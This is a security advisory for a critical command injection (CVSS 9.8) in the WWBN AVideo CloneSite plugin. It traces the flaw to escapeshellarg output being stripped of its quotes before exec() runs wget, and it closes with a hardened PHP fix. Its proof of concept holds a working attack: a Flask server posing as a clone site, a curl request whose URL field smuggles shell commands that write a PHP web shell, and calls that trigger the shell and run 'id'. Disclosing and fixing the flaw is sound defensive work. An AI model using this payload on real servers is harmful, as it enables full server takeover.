PT-2026-35332 · Packagist · Wwbn Avideo

Published 2026-04-16 · Updated 2026-04-16

CVSS v3.1: 9.8 (Critical)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description

Summary

The cloneServer.json.php endpoint in the CloneSite plugin constructs shell commands using user-controlled input (url parameter) without proper sanitization. The input is directly concatenated into a wget command executed via exec(), allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., ;). This leads to Remote Code Execution (RCE) on the server.

Details

In plugin/CloneSite/cloneClient.json.php (line 112) the URL is not properly sanitized:

```php
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
```

The str_replace() strips the single quotes that escapeshellarg() adds, which undoes the quoting, so an attacker can place shell metacharacters in cloneSiteURL and reach RCE through the command built from it:

```php
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; // line 116
$cmd = "wget -O {$sqlFile} {$sqlURL}";                             // line 117
exec($cmd . " 2>&1", $output, $return_val);                       // line 119
```

The attack flow:

  1. Set up a malicious site that serves the clone data.
  2. Add the malicious URL via objects/pluginAddDataObject.json.php.
  3. Access plugin/CloneSite/cloneClient.json.php to trigger the RCE.

PoC

Set up the malicious site with a small Flask app like this:

```python
from flask import Flask, jsonify, request

app = Flask(__name__)

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
    print("PATH:", path)
    return jsonify({
        "error": False,
        "msg": "",
        "url": "http://target-site.com/",
        "key": "target_clone_key",
        "useRsync": 0,
        "videosDir": "/var/www/html/AVideo/videos/",
        "sqlFile": "Clone_mysqlDump_evil123.sql",
        "videoFiles": [],
        "photoFiles": []
    })

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8071)
```
Then set the plugin URL with a payload like this (requires an admin session):

```shell
curl -b 'PHPSESSID=<admin session>' \
  -X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \
  -H "Content-Type: application/json" \
  -d '{
  "cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system($_POST[1])?>\"${IFS}>1.php;/",
  "cloneSiteSSHIP":"127.0.0.1",
  "cloneSiteSSHUser":"1",
  "cloneSiteSSHPort":"22",
  "cloneSiteSSHPassword":{
    "type":"encrypted",
    "value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
  },
  "useRsync":true,
  "MaintenanceMode":false,
  "myKey":"ba882541262f3202ee5a5ad790ae5b70"
}'
# inject the malicious code
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" # trigger the RCE, which writes 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php" \
  -d '1=id'
# uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

This payload creates a web shell: once plugin/CloneSite/cloneClient.json.php is accessed, 1.php is written.

Impact

  • Remote Code Execution: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
  • Full server compromise: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.

Recommended Fix

Apply stronger sanitization to $objClone->cloneSiteURL.
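As an added illustration (not AVideo's own code), the quoting pattern from the Details section is shown beside a hardened builder that validates the URL and leaves the quoting from escapeshellarg() intact; the function names and the sample input are hypothetical:

```php
<?php
// Added example, not AVideo's code. Function names and the sample input are
// hypothetical; only the quoting pattern is taken from the advisory.

// Vulnerable pattern: escapeshellarg() wraps the value in single quotes, and
// str_replace() immediately strips them again, so shell metacharacters inside
// the URL reach exec() unquoted and split the wget command.
function buildWgetCommandVulnerable(string $cloneSiteURL, string $sqlFile, string $sqlName): string
{
    $cloneSiteURL = str_replace("'", '', escapeshellarg($cloneSiteURL));
    $sqlURL = "{$cloneSiteURL}videos/clones/{$sqlName}";
    return "wget -O {$sqlFile} {$sqlURL}";
}

// Hardened pattern: reject anything that is not an http(s) URL, constrain the
// remote-supplied dump file name, and quote every argument with
// escapeshellarg() without undoing it. The single quotes are what keep
// metacharacters inert; the URL check only narrows the input space.
// Better still, fetch the file with PHP's own HTTP client and avoid the shell.
function buildWgetCommandHardened(string $cloneSiteURL, string $sqlFile, string $sqlName): ?string
{
    if (filter_var($cloneSiteURL, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($cloneSiteURL, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;
    }
    // sqlFile comes from the remote site's JSON, so allow only a plain file name.
    if (!preg_match('/^[A-Za-z0-9._-]+\.sql$/', $sqlName)) {
        return null;
    }
    $sqlURL = rtrim($cloneSiteURL, '/') . '/videos/clones/' . $sqlName;
    return 'wget -O ' . escapeshellarg($sqlFile) . ' ' . escapeshellarg($sqlURL);
}

// Constructed sample: a URL carrying a ';' the way the advisory's payload does.
$hostile = 'http://127.0.0.1:8071/;id;/';
echo buildWgetCommandVulnerable($hostile, '/tmp/dump.sql', 'dump.sql'), PHP_EOL;
// With the hardened builder the whole URL stays one single-quoted argument,
// so the ';' is handed to wget as part of the URL rather than to the shell.
echo buildWgetCommandHardened($hostile, '/tmp/dump.sql', 'dump.sql') ?? 'rejected', PHP_EOL;
```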

Weakness Enumeration

OS Command Injection

Command Injection

Related Identifiers

GHSA-XR6F-H4X7-R6QP

Affected Products

Wwbn Avideo